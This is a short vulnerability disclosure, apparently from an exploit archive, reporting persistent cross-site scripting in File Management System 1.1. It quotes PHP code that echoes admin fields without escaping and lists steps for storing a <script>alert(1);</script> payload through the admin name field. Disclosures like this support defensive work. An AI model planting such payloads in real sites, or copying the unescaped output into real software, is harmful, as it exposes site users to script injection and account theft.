File Management System 1.1 Cross Site Scripting

File Management System version 1.1 suffers from a persistent cross site scripting vulnerability.

MD5 | 57c219d025fd9b68e5d82101af2884fb

# Exploit Title: File Management System 1.1 - Persistent Cross-Site Scripting
# Date: 2020-06-30
# Exploit Author: KeopssGroup0day,Inc
# Vendor Homepage:
# Software Link:
# Version: 0.1.0
# Tested on: Kali Linux

Source code(view_admin.php.php):
$query="SELECT * FROM admin_login";
$id = $rs['id'];
<td width='10%'><?php echo $fname; ?></td>
<td align='center'><?php echo $admin; ?></td>
<td align='center' width="20%"><?php echo $pass; ?></td>
<td align='center'><?php echo $status; ?></td>
<td align='center'><a href="#modalRegisterFormsss?id=<?php echo
<i class="fas fa-user-edit" data-toggle="modal"
data-target="#modalRegisterFormsss"></i> </a> | <a
href="delete_admin.php?id=<?php echo htmlentities($rs['id']); ?>"><i
class='far fa-trash-alt'></i></a></td>
<?php } ?>



2. Add admin click button

3. We write payload in the name section (<script>alert(1);</script>)

4. And view admin click button

5. And our bad payload will be displayed

Related Posts